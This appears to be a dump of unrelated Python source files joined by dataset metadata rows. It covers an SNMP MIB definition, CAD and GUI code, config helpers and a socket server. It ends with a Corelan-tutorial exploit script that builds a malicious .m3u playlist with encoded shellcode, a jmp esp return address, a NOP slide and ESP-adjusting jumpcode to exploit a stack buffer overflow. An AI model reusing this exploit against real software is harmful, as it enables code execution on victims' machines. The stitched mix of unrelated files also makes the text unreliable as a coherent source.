hwCfgChgSeqID = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgChgSeqID.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgSeqID.setDescription('The value of this object identifies the configuration change ID. When configuration is changed, the sequence id will plus 1.')
hwCfgChgTime = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 1, 1, 2), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgChgTime.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgTime.setDescription('This object indicates the configuration change time.')
hwCfgChgTerminalType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("snmp", 1), ("telnet", 2), ("netconf", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgChgTerminalType.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgTerminalType.setDescription('This object indicates the type of the terminal.')
hwCfgChgTerminalID = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgChgTerminalID.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgTerminalID.setDescription('The value of this object identifies the terminal ID.')
hwCfgChgType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("create", 1), ("modify", 2), ("delete", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgChgType.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgType.setDescription('This object indicates the configuration change type.')
hwCfgChgViewName = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 1, 1, 6), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgChgViewName.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgViewName.setDescription('This object indicates the name of the view in which the configuration change occurs. For the command operation, the object is the name of the view in which the command is run. For the SNMP operation, the object is the OID of the MIB table or the scalar object.')
hwCfgChgCmdID = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 1, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgChgCmdID.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgCmdID.setDescription('The value of this object identifies the ID of the configuration change command. For the SNMP operation, the value is 0.')
hwCfgChgDetailInfo = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 1, 1, 8), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgChgDetailInfo.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgDetailInfo.setDescription('This object indicates detailed configuration change information. For the command operation, the object is the command line. For the SNMP operation, the object is the index of the MIB table. When there are multiple indexes, the format of index1.index2.index3 is adopted.')
hwCollectTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 2), )
if mibBuilder.loadTexts: hwCollectTable.setStatus('current')
if mibBuilder.loadTexts: hwCollectTable.setDescription('This table is used to enable the NMS to send the collecting script to the device to trigger the collection, and then monitor the collection status.')
hwCollectEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 2, 1), ).setIndexNames((0, "HUAWEI-DATASYNC-MIB", "hwCollectIndex"))
if mibBuilder.loadTexts: hwCollectEntry.setStatus('current')
if mibBuilder.loadTexts: hwCollectEntry.setDescription('Entry of hwCollectTable.')
hwCollectIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 2, 1, 1), Integer32())
if mibBuilder.loadTexts: hwCollectIndex.setStatus('current')
if mibBuilder.loadTexts: hwCollectIndex.setDescription('The value of this object identifies the collection index.')
hwCollectNetManageId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 2, 1, 2), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: hwCollectNetManageId.setStatus('current')
if mibBuilder.loadTexts: hwCollectNetManageId.setDescription('The value of this object identifies the NMS ID.')
hwCollectOperation = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 2, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("begin", 1), ("stop", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: hwCollectOperation.setStatus('current')
if mibBuilder.loadTexts: hwCollectOperation.setDescription('This object indicates the instruction for the collection operation. Default value is stop.')
hwCollectInScriptFile = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 2, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 255))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: hwCollectInScriptFile.setStatus('current')
if mibBuilder.loadTexts: hwCollectInScriptFile.setDescription('This object indicates the name of the script file. T he length of the file name ranges from 1 character to 255 characters.')
hwCollectInResultFile = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 2, 1, 5), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 255))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: hwCollectInResultFile.setStatus('current')
if mibBuilder.loadTexts: hwCollectInResultFile.setDescription('This object indicates the name of the result file. The length of the file name ranges from 1 character to 255 characters.')
hwCollectState = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 2, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("idle", 1), ("collecting", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCollectState.setStatus('current')
if mibBuilder.loadTexts: hwCollectState.setDescription('This object indicates the collection status.')
hwCollectRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 2, 1, 7), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hwCollectRowStatus.setStatus('current')
if mibBuilder.loadTexts: hwCollectRowStatus.setDescription('This object indicates the row status.')
hwCfgChgNotify = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 3, 1)).setObjects(("HUAWEI-DATASYNC-MIB", "hwCurrentCfgChgSeqID"), ("HUAWEI-DATASYNC-MIB", "hwCfgChgSeqIDReveralCount"), ("HUAWEI-DATASYNC-MIB", "hwCfgChgTableMaxItem"), ("HUAWEI-DATASYNC-MIB", "hwCfgBaselineTime"))
if mibBuilder.loadTexts: hwCfgChgNotify.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgNotify.setDescription('This trap is generated when a configuration change occurs on the device within a specified period.')
hwCfgLastSaveFailNotify = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 3, 2))
if mibBuilder.loadTexts: hwCfgLastSaveFailNotify.setStatus('current')
if mibBuilder.loadTexts: hwCfgLastSaveFailNotify.setDescription('The last save operation failed, please check the configuration.')
mibBuilder.exportSymbols("HUAWEI-DATASYNC-MIB", hwDataSyncNotifications=hwDataSyncNotifications, hwCfgChgNotifyGroup=hwCfgChgNotifyGroup, DateAndTime=DateAndTime, hwDataSync=hwDataSync, hwCollectIndex=hwCollectIndex, hwDataSyncScalarObjectsGroup=hwDataSyncScalarObjectsGroup, hwCfgChgSeqID=hwCfgChgSeqID, hwCollectState=hwCollectState, hwCfgBaselineTime=hwCfgBaselineTime, hwCfgChgViewName=hwCfgChgViewName, hwDataSyncScalarObjects=hwDataSyncScalarObjects, hwCfgChgType=hwCfgChgType, hwCfgChgCmdID=hwCfgChgCmdID, hwCfgChgEntry=hwCfgChgEntry, hwCollectTable=hwCollectTable, hwDataSyncConformance=hwDataSyncConformance, hwCfgChgTerminalID=hwCfgChgTerminalID, hwCurrentCfgChgSeqID=hwCurrentCfgChgSeqID, hwCollectEntry=hwCollectEntry, hwCollectNetManageId=hwCollectNetManageId, hwCfgChgDetailInfo=hwCfgChgDetailInfo, hwCollectInScriptFile=hwCollectInScriptFile, hwCfgChgTable=hwCfgChgTable, hwCollectInResultFile=hwCollectInResultFile, PYSNMP_MODULE_ID=hwDataSync, hwDataSyncNotifyGroup=hwDataSyncNotifyGroup, hwDataSyncTableObjects=hwDataSyncTableObjects, hwCfgChgNotify=hwCfgChgNotify, hwCollectOperation=hwCollectOperation, hwCfgChgSeqIDReveralCount=hwCfgChgSeqIDReveralCount, hwCfgLastSaveFailNotify=hwCfgLastSaveFailNotify, hwCfgChgTableMaxItem=hwCfgChgTableMaxItem, hwDataSyncCompliance=hwDataSyncCompliance, hwDataSyncCompliances=hwDataSyncCompliances, hwCfgChgTime=hwCfgChgTime, hwCfgChgTerminalType=hwCfgChgTerminalType, hwDataSyncGroups=hwDataSyncGroups, hwCollectRowStatus=hwCollectRowStatus)
| 129.976563 | 1,499 | 0.77508 | 2,032 | 16,637 | 6.34498 | 0.184055 | 0.054914 | 0.096099 | 0.011169 | 0.458776 | 0.314202 | 0.26239 | 0.253859 | 0.207942 | 0.207787 | 0 | 0.068588 | 0.099116 | 16,637 | 127 | 1,500 | 131 | 0.791633 | 0.019956 | 0 | 0.042373 | 0 | 0.09322 | 0.319588 | 0.011843 | 0.008475 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.059322 | 0 | 0.101695 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
483ea9c4afcf9c24247487d5e928c59c68b673d7 | 982 | py | Python | src/compas_rhino/artists/pointartist.py | funkchaser/compas | b58de8771484aa0c6068d43df78b1679503215de | [
"MIT"
] | 235 | 2017-11-07T07:33:22.000Z | 2022-03-25T16:20:00.000Z | src/compas_rhino/artists/pointartist.py | funkchaser/compas | b58de8771484aa0c6068d43df78b1679503215de | [
"MIT"
] | 770 | 2017-09-22T13:42:06.000Z | 2022-03-31T21:26:45.000Z | src/compas_rhino/artists/pointartist.py | funkchaser/compas | b58de8771484aa0c6068d43df78b1679503215de | [
"MIT"
] | 99 | 2017-11-06T23:15:28.000Z | 2022-03-25T16:05:36.000Z | from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import compas_rhino
from compas.artists import PrimitiveArtist
from .artist import RhinoArtist
class PointArtist(RhinoArtist, PrimitiveArtist):
"""Artist for drawing points.
Parameters
----------
point : :class:`compas.geometry.Point`
A COMPAS point.
layer : str, optional
The layer that should contain the drawing.
"""
def __init__(self, point, layer=None, **kwargs):
super(PointArtist, self).__init__(primitive=point, layer=layer, **kwargs)
def draw(self):
"""Draw the point.
Returns
-------
list
The GUIDs of the created Rhino objects.
"""
points = [{'pos': list(self.primitive), 'color': self.color, 'name': self.primitive.name}]
guids = compas_rhino.draw_points(points, layer=self.layer, clear=False, redraw=False)
return guids
| 27.277778 | 98 | 0.657841 | 111 | 982 | 5.594595 | 0.45045 | 0.048309 | 0.077295 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.234216 | 982 | 35 | 99 | 28.057143 | 0.825798 | 0.263747 | 0 | 0 | 0 | 0 | 0.018721 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.461538 | 0 | 0.769231 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
48402832da134998cb30b07c0cce5f9e6b5f65bd | 5,628 | py | Python | GUI/class_Bolita.py | AnuTor/UniNeuroLab | 5825f440d4663650f038083f3da05229cc5ada4f | [
"Apache-2.0"
] | null | null | null | GUI/class_Bolita.py | AnuTor/UniNeuroLab | 5825f440d4663650f038083f3da05229cc5ada4f | [
"Apache-2.0"
] | null | null | null | GUI/class_Bolita.py | AnuTor/UniNeuroLab | 5825f440d4663650f038083f3da05229cc5ada4f | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[1]:
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import QApplication, QMainWindow
#from PyQt5.QtCore import Qt
import numpy as np
#import sys
#import time
global n
rango=np.arange(1,26)
n= np.random.permutation(rango)
## Creo una segunda Clase
st = str("border-radius : 15; border : 1px solid black")
#global st
class Bolitas():
""" Aqui crearemos cada una de las bolitas del test
con sus atributos y sus metodos para trabajarlas como objetos"""
def __init__(self, setGeometry , t_Obj = QtWidgets.QPushButton, id = 0, valor = 0, estado = 0, setStyleSheet = st):
#super(Bolitas, self).__init__()
""" Create a new point at the origin """
self.g1 = setGeometry[0] #Coordenada X
self.g2 = setGeometry[1] #Coordenada Y
self.g3 = setGeometry[2] #Anchura
self.g4 = setGeometry[3] #Altura
self.t_Obj= QtWidgets.QPushButton
self.id = id
self.valor = valor # puede tomar valores del 1 al 25
self.estado = estado # puede tener 3 estados Blanca, Verde o Roja
self.setStyleSheet = st
'''
def cambioColor(self):
""" Este metodo hace que la bolita cambie de estado"""
global estado #estado1
global n
global tr1
global tr2
global tr3
global tr4
global tr5
print("El estado de la bolita", "es: ")
print(estado)
estado = estado +1
#numero_estado1=numero_estado1+1
if numero_estado1==n[0]:
print("Color Verde")
self.b1.setStyleSheet("background-color: green; color: white; border-radius : 15; border : 1px solid green")
# Aqui hay que evaluar todas las codiciones relativas de todas las bolitas
if tr2==1:
self.b2.setStyleSheet("border-radius : 15; border : 1px solid black")
tr2=0
if tr3==1:
self.b3.setStyleSheet("border-radius : 15; border : 1px solid black")
tr3=0
if tr4==1:
self.b4.setStyleSheet("border-radius : 15; border : 1px solid black")
tr4=0
if tr5==1:
self.b5.setStyleSheet("border-radius : 15; border : 1px solid black")
tr5=0
elif numero_estado1 != n[0] :
print("Color Rojo")
self.b1.setStyleSheet("background-color: red; color: white; border-radius : 15; border : 1px solid red")
print("El número es mayor al esperado, elija el número siguiente al marcado en verde")
numero_estado1=numero_estado1-1
tr1=1 #Levanto el flag de que se presionó una bolita mayor a la esperada
else:
print("Color Negro")
self.b1.setStyleSheet("border-radius : 15; border : 1px solid black")
def contarIntentos(self):
este metodo cuanta cuantos click se hacen sobre el boton-bolita
return num_intentos
'''
print("Me parece que cree la primer bolita")
#print("Este es n: ", n)
i= 0
numero_estado1 = 0
numero_estado2 = 0
numero_estado3 = 0
numero_estado4 = 0
numero_estado5 = 0
numero_estado6 = 0
numero_estado7 = 0
numero_estado8 = 0
numero_estado9 = 0
numero_estado10 = 0
numero_estado11 = 0
numero_estado12 = 0
numero_estado13 = 0
numero_estado14 = 0
numero_estado15 = 0
numero_estado16 = 0
numero_estado17 = 0
numero_estado18 = 0
numero_estado19 = 0
numero_estado20 = 0
numero_estado21 = 0
numero_estado22 = 0
numero_estado23 = 0
numero_estado24 = 0
numero_estado25 = 0
# Creamos una bolita (25-bolitas) ahora como objeto de la clase Bolitas
b1 = Bolitas([400,400,30,30], QtWidgets.QPushButton, "1" , n[0], 0, st)
b2 = Bolitas([460,480,30,30], QtWidgets.QPushButton, "2" , n[1], 0, st)
b3 = Bolitas([250,450,30,30], QtWidgets.QPushButton, "3" , n[2], 0, st)
b4 = Bolitas([450,370,30,30] , QtWidgets.QPushButton, "4" , n[3], 0, st)
b5 = Bolitas([250,50,30,30], QtWidgets.QPushButton, "5" , n[4], 0, st)
b6 = Bolitas([20,470,30,30], QtWidgets.QPushButton, "6" , n[5], 0, st)
b7 = Bolitas([380,200,30,30], QtWidgets.QPushButton, "7" , n[6], 0, st)
b8 = Bolitas([200,200,30,30] , QtWidgets.QPushButton, "8" , n[7], 0, st)
b9 = Bolitas([250,350,30,30] , QtWidgets.QPushButton, "9" , n[8], 0, st)
b10 = Bolitas([180,280,30,30] , QtWidgets.QPushButton, "10", n[9], 0, st)
b11 = Bolitas([130,420,30,30], QtWidgets.QPushButton, "11", n[10],0, st)
b12 = Bolitas([420,130,30,30] , QtWidgets.QPushButton, "12", n[11],0, st)
b13 = Bolitas([200,90,30,30] , QtWidgets.QPushButton, "13", n[12],0, st)
b14 = Bolitas([330,290,30,30] , QtWidgets.QPushButton, "14", n[13],0, st)
b15 = Bolitas([150,370,30,30] , QtWidgets.QPushButton, "15", n[14],0, st)
b16 = Bolitas([380,80,30,30], QtWidgets.QPushButton, "16", n[15],0, st)
b17 = Bolitas([325,200,30,30], QtWidgets.QPushButton, "17", n[16],0, st)
b18 = Bolitas([270,300,30,30] , QtWidgets.QPushButton, "18", n[17],0, st)
b19 = Bolitas([20,180,30,30] , QtWidgets.QPushButton, "19", n[18],0, st)
b20 = Bolitas([35,320,30,30] , QtWidgets.QPushButton, "20", n[19],0, st)
b21 = Bolitas([90,360,30,30] , QtWidgets.QPushButton, "21", n[20],0, st)
b22 = Bolitas([95,140,30,30] , QtWidgets.QPushButton, "22", n[21],0, st)
b23 = Bolitas([70,220,30,30] , QtWidgets.QPushButton, "23", n[22],0, st)
b24 = Bolitas([180,150,30,30], QtWidgets.QPushButton, "24", n[23],0, st)
b25 = Bolitas([135,80,30,30] , QtWidgets.QPushButton, "25", n[24],0, st)
| 34.109091 | 120 | 0.617093 | 816 | 5,628 | 4.204657 | 0.322304 | 0.157389 | 0.094725 | 0.174876 | 0.203439 | 0.113378 | 0.098805 | 0.089187 | 0 | 0 | 0 | 0.128568 | 0.246802 | 5,628 | 164 | 121 | 34.317073 | 0.680821 | 0.089375 | 0 | 0 | 0 | 0 | 0.037748 | 0 | 0 | 0 | 0 | 0.018293 | 0 | 1 | 0.014286 | false | 0 | 0.042857 | 0 | 0.071429 | 0.014286 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
48458268785e68b363c117611b61e713674bbf90 | 307 | py | Python | tests/config/conftest.py | ConsenSys/python-utils | 9725f15f688303e116b7937242f8354a4a070808 | [
"MIT"
] | 4 | 2019-04-14T02:08:19.000Z | 2021-04-14T19:10:04.000Z | tests/config/conftest.py | ConsenSys/python-utils | 9725f15f688303e116b7937242f8354a4a070808 | [
"MIT"
] | 4 | 2018-07-29T19:10:49.000Z | 2018-08-08T16:33:01.000Z | tests/config/conftest.py | ConsenSys/python-utils | 9725f15f688303e116b7937242f8354a4a070808 | [
"MIT"
] | 2 | 2019-10-24T21:28:46.000Z | 2021-02-16T10:51:57.000Z | """
tests.config.conftest
~~~~~~~~~~~~~~~~~~~~~
:copyright: Copyright 2017 by ConsenSys France.
:license: BSD, see LICENSE for more details.
"""
import os
import pytest
@pytest.fixture(scope='session')
def config_files_dir(test_dir):
yield os.path.join(test_dir, 'config', 'files')
| 18.058824 | 51 | 0.644951 | 38 | 307 | 5.105263 | 0.710526 | 0.113402 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015748 | 0.172638 | 307 | 16 | 52 | 19.1875 | 0.748032 | 0.446254 | 0 | 0 | 0 | 0 | 0.123288 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.4 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
4849326d5f2864496a94bf5145f71dee5cdb0069 | 379 | py | Python | sphinxcontrib/needs/services/base.py | David-Le-Nir/sphinxcontrib-needs | fe809445505fa1e9bf5963eab1d6283dad405e92 | [
"MIT"
] | 1 | 2022-03-24T08:55:28.000Z | 2022-03-24T08:55:28.000Z | sphinxcontrib/needs/services/base.py | David-Le-Nir/sphinxcontrib-needs | fe809445505fa1e9bf5963eab1d6283dad405e92 | [
"MIT"
] | null | null | null | sphinxcontrib/needs/services/base.py | David-Le-Nir/sphinxcontrib-needs | fe809445505fa1e9bf5963eab1d6283dad405e92 | [
"MIT"
] | null | null | null | from sphinxcontrib.needs.logging import get_logger
class BaseService:
def __init__(self, *args, **kwargs):
self.log = get_logger(__name__)
def request(self, *args, **kwargs):
raise NotImplementedError("Must be implemented by the service!")
def debug(self, *args, **kwargs):
raise NotImplementedError("Must be implemented by the service!")
| 29.153846 | 72 | 0.693931 | 45 | 379 | 5.622222 | 0.577778 | 0.094862 | 0.166008 | 0.150198 | 0.529644 | 0.529644 | 0.529644 | 0.529644 | 0.529644 | 0.529644 | 0 | 0 | 0.197889 | 379 | 12 | 73 | 31.583333 | 0.832237 | 0 | 0 | 0.25 | 0 | 0 | 0.184697 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.375 | false | 0 | 0.125 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
48558594c3096bfbc0e20192b5caa99e79018e52 | 1,639 | py | Python | solum/common/config.py | devdattakulkarni/test-solum | 4e9ddb82d217116aa2c30a6f2581080cbdfae325 | [
"Apache-2.0"
] | null | null | null | solum/common/config.py | devdattakulkarni/test-solum | 4e9ddb82d217116aa2c30a6f2581080cbdfae325 | [
"Apache-2.0"
] | null | null | null | solum/common/config.py | devdattakulkarni/test-solum | 4e9ddb82d217116aa2c30a6f2581080cbdfae325 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2016 Hewlett Packard Enterprise Development Corporation, LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_config import cfg
from oslo_middleware import cors
def set_config_defaults():
"""This method updates all configuration default values."""
set_cors_middleware_defaults()
def set_cors_middleware_defaults():
"""Update default configuration options for oslo.middleware."""
# CORS Defaults
# TODO(krotscheck): Update with https://review.openstack.org/#/c/285368/
cfg.set_defaults(cors.CORS_OPTS,
allow_headers=['X-Auth-Token',
'X-Openstack-Request-Id',
'X-Subject-Token'],
expose_headers=['X-Auth-Token',
'X-Openstack-Request-Id',
'X-Subject-Token'],
allow_methods=['GET',
'PUT',
'POST',
'DELETE',
'PATCH']
) | 39.97561 | 76 | 0.577791 | 181 | 1,639 | 5.149171 | 0.596685 | 0.064378 | 0.027897 | 0.034335 | 0.10515 | 0.10515 | 0.10515 | 0.10515 | 0.10515 | 0.10515 | 0 | 0.012891 | 0.337401 | 1,639 | 41 | 77 | 39.97561 | 0.845304 | 0.482611 | 0 | 0.222222 | 0 | 0 | 0.144769 | 0.053528 | 0 | 0 | 0 | 0.02439 | 0 | 1 | 0.111111 | true | 0 | 0.111111 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
48586969737d81ee3de0e8c13dfe77791efd4eca | 534 | py | Python | Task2_svr.py | malincj/hw01_cw_ans | 867a21a6574a5c380780c581b4fcc7efaf150c57 | [
"MIT"
] | null | null | null | Task2_svr.py | malincj/hw01_cw_ans | 867a21a6574a5c380780c581b4fcc7efaf150c57 | [
"MIT"
] | null | null | null | Task2_svr.py | malincj/hw01_cw_ans | 867a21a6574a5c380780c581b4fcc7efaf150c57 | [
"MIT"
] | null | null | null | #Task2
import socket
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
#Listen port
socket.bind(("localhost",8181));
#Clients connect
socket.listen(2)
cnt = 1;
chk = '';
while cnt <= 2:
(c, Addresses) = socket.accept();
print("Connected %s:%s"%(Addresses[0], Addresses[1]));
if cnt == 1:
clientdata = c.recv(1024)
tr = clientdata.decode();
chk = int(tr);
c.close();
else :
chk -= 1;
c.send(str(chk).encode());
c.close();
break;
cnt += 1
| 19.777778 | 59 | 0.554307 | 69 | 534 | 4.26087 | 0.565217 | 0.163265 | 0.183673 | 0.163265 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043367 | 0.265918 | 534 | 26 | 60 | 20.538462 | 0.706633 | 0.058052 | 0 | 0.1 | 0 | 0 | 0.048 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.05 | 0 | 0.05 | 0.05 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
487164f9f3c31a3c2c1e44b69882d2efa80114b3 | 2,166 | py | Python | corelan-exploit-writing-tutorial/stack-based-overflows/exploit-smallbuffers.py | pravinsrc/Exploite-windows | 1245ec8b0353f8bcc52ca6038e75a345f2d656ff | [
"MIT"
] | 71 | 2018-09-25T13:33:57.000Z | 2022-03-22T19:14:06.000Z | corelan-exploit-writing-tutorial/stack-based-overflows/exploit-smallbuffers.py | pravinsrc/windows-exploitation | 1245ec8b0353f8bcc52ca6038e75a345f2d656ff | [
"MIT"
] | null | null | null | corelan-exploit-writing-tutorial/stack-based-overflows/exploit-smallbuffers.py | pravinsrc/windows-exploitation | 1245ec8b0353f8bcc52ca6038e75a345f2d656ff | [
"MIT"
] | 24 | 2018-12-03T20:02:36.000Z | 2021-12-14T10:55:40.000Z | import struct
OUTPUT_FILE = "exploit.m3u"
def get_shellcode():
# windows/exec - 216 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=seh, CMD=calc
buf = ""
buf += "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
buf += "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
buf += "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
buf += "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
buf += "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"
buf += "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
buf += "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
buf += "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
buf += "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
buf += "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
buf += "\x7f\xe8\x7b\xca"
return buf
def get_jumpcode():
jumpcode = ""
jumpcode += "\x83\xc4\x7e" # add esp,0x5e
jumpcode += "\x83\xc4\x7e" # add esp,0x5e
jumpcode += "\x83\xc4\x7e" # add esp,0x5e
jumpcode += "\x83\xc4\x7e" # add esp,0x5e
jumpcode += "\xff\xe4" # jmp esp
return jumpcode
def generate_exploit():
buffer_size = 26064
# offset = 465, esp needs to be 0xf38 - 0xd38 = 0x200 = 512d
junk = "A" * 460
eip = struct.pack('<I', 0x7e498c6b) # jmp esp
nope_slide = "\x90" * 50
shellcode = get_shellcode()
restofbuffer_len = buffer_size - (len(junk) + len(nope_slide) + len(shellcode))
restofbuffer = "\x90" * restofbuffer_len
preshellcode = "X" * 4
buffer = junk + nope_slide + shellcode + restofbuffer
buffer += eip + preshellcode + get_jumpcode()
return buffer
def write_file(buffer):
try:
with open(OUTPUT_FILE, "w") as f:
f.write(buffer)
except IOError:
print "Failed to write file !"
def main():
exploit = generate_exploit()
write_file(exploit)
print "Exploit generated !"
if __name__ == "__main__":
main()
